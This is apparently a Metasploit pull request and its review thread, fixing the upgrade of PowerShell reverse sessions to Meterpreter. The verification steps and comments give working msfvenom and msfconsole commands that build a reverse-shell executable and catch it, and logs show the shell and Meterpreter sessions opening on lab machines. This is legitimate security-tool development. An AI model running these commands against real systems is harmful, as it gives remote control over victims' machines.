### PR TITLE
support upgrading a powershell session to meterpreter

### LINKED ISSUE #5947: upgrading a powershell session to meterpreter does not work
Our checks are too tight, and powershell sessions do not expose a platform string.

### PR DESCRIPTION
**Pull request by bcook-r7**
This fixes #5947, partially fixes issue reported on twitter https://twitter.com/info_dox/status/641197304872050688
# Verification Steps
- [x] Create a powershell session, e.g.:

```
./msfvenom -p windows/powershell_reverse_tcp -f exe -o psh.exe LHOST=192.168.56.1
./msfconsole -qx 'use exploit/multi/handler; set payload windows/powershell_reverse_tcp; set lhost 192.168.56.1; run'
```
- [x] Background the session with ctrl-z and upgrade with 'sessions -u 1'
- [x] You should see something like this:

```
msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse handler on 192.168.56.1:4433
[*] Starting the payload handler...
[*] Sending stage (885806 bytes) to 192.168.56.102
[*] Meterpreter session 2 opened (192.168.56.1:4433 -> 192.168.56.102:49373) at 2015-09-08 15:35:22 +0200
```

### CODE REVIEW

**Comment by wchen-r7** [comment]
Hmmmm @bcook-r7, could you please double check windows/powershell_reverse_tcp is in good working condition? I've tried this on Win 7 and Win 8.1, and my CPU gets really busy but no shell. Maybe it's just a minor problem on my end, but would like to double check. Thanks.

**Comment by bcook-r7** [comment]
still works for me on HEAD:

```
$:~/projects/metasploit-framework$ ./msfvenom -p windows/powershell_reverse_tcp -f exe -o psh.exe LHOST=192.168.56.1
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1719 bytes
Saved as: psh.exe

$:~/projects/metasploit-framework$ ./msfconsole -qx 'use exploit/multi/handler; set payload windows/powershell_reverse_tcp; set lhost 192.168.56.1; run'
payload => windows/powershell_reverse_tcp
lhost => 192.168.56.1
[*] Started reverse SSL handler on 192.168.56.1:4444
[*] Starting the payload handler...
[*] Powershell session session 1 opened (192.168.56.1:4444 -> 192.168.56.102:49299) at 2015-09-08 21:09:30 +0200

Windows PowerShell running as user bcook on MSF-DEV
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS E:\metasploit-framework>
```

**Comment by wchen-r7** [comment]
Ok, I'll try again. thanks!

**Comment by wchen-r7** [comment]
I'm gonna unassign myself from this pull request, because every time I execute the powershell payload, my VM's CPU goes 100% and I don't get a shell. Maybe the next person has better luck than me.

**Comment by 0x27** [comment]
It should be noted the issue was also found using ["cmd/windows/reverse_powershell"](https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/cmd/windows/reverse_powershell.rb) payloads when using one of the HP Data Protector exploits, just to add to the confusion (targets: Windows 7, Windows 2008, Windows 8.1). I would get a command shell back via the powershell backconnect, but would not be able to upgrade it using powershell.

**Comment by wchen-r7** [comment]
@jvazquez-r7

**Comment by jvazquez-r7** [comment]
Giving a chance to it!

**Comment by jvazquez-r7** [comment]
My results:

* Windows 7 SP1

```
$ ./msfconsole -qx 'use exploit/multi/handler; set payload windows/powershell_reverse_tcp; set lhost 172.16.158.1; run'
payload => windows/powershell_reverse_tcp
lhost => 172.16.158.1
[*] Started reverse SSL handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Powershell session session 1 opened (172.16.158.1:4444 -> 172.16.158.131:49285) at 2015-09-16 09:11:56 -0500

Windows PowerShell running as user Juan Vazquez on WIN-RNJ7NBRK9L7
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\Juan Vazquez\Desktop>^Z
Background session 1? [y/N]  y

msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse handler on 172.16.158.1:4433
[*] Starting the payload handler...
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
[*] Command stager progress: 3.33% (3398/102108 bytes)
[*] Command stager progress: 4.99% (5097/102108 bytes)
[*] Command stager progress: 6.66% (6796/102108 bytes)
```

* Windows 8.1

```
msf exploit(handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse handler on 172.16.158.1:4433
[*] Starting the payload handler...
[-] Powershell is not installed on the target.
```

mmmm I'd say these `Powershell is not installed on the target` aren't expected

File: lib/msf/ui/console/command_dispatcher/core.rb [hunk 1]
```diff
@@ -1917,12 +1917,12 @@ def cmd_sessions(*args)
             session.response_timeout = response_timeout
           end
           begin
-            if session.type == 'shell'
+            if session.type.include? 'shell'
```
Comment (jvazquez-r7) [inline lib/msf/ui/console/command_dispatcher/core.rb]: To allow easier code readability I'd recommend to write:

```
if ['shell', 'powershell'].include?(session.type)
```

Comment (jvazquez-r7) [inline lib/msf/ui/console/command_dispatcher/core.rb]: Otherwise the code reader needs to guess one of the session types is 'powershell' :)

**Comment by jvazquez-r7** [comment]
On shell_to_meterpreter.rb:

```ruby
    when 'win'
      if (have_powershell?) && (datastore['WIN_TRANSFER'] != 'VBS')
        vprint_status("Transfer method: Powershell")
        psh_opts = { :prepend_sleep => 1, :encode_inner_payload => true, :persist => false }
        cmd_exec(cmd_psh_payload(payload_data, psh_arch, psh_opts))

```

`have_powershell` isn't returning the expected value. Even when the command returns the expected output if I run it on a cmd.exe at the target:

```
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Users\juan>echo. | powershell get-host


Name             : ConsoleHost
Version          : 4.0
InstanceId       : 09831fb0-8687-40ce-844a-1fe938084ea5
UI               : System.Management.Automation.Internal.Host.InternalHostUserI
                   nterface
CurrentCulture   : en-US
CurrentUICulture : en-US
PrivateData      : Microsoft.PowerShell.ConsoleHost+ConsoleColorProxy
IsRunspacePushed : False
Runspace         : System.Management.Automation.Runspaces.LocalRunspace




C:\Users\juan>
```

File: lib/msf/ui/console/command_dispatcher/core.rb (hunk 1 above)
Comment (bcook-r7) [inline lib/msf/ui/console/command_dispatcher/core.rb]: Fair point, fixing.

**Comment by bcook-r7** [comment]
The '&' character inserted by shell_command_token_win32 causes different versions of powershell to barf.

**Comment by jvazquez-r7** [comment]
@bcook-r7 see https://github.com/bcook-r7/metasploit-framework/pull/1

**Comment by bcook-r7** [comment]
That's much better, thanks @jvazquez-r7 . The original way was much too heavy-handed since we already knew it was a powershell session. Landed :)

**Comment by bcook-r7** [comment]
I totally do not deserve credit for this, thanks though! :)

**Pull request merged**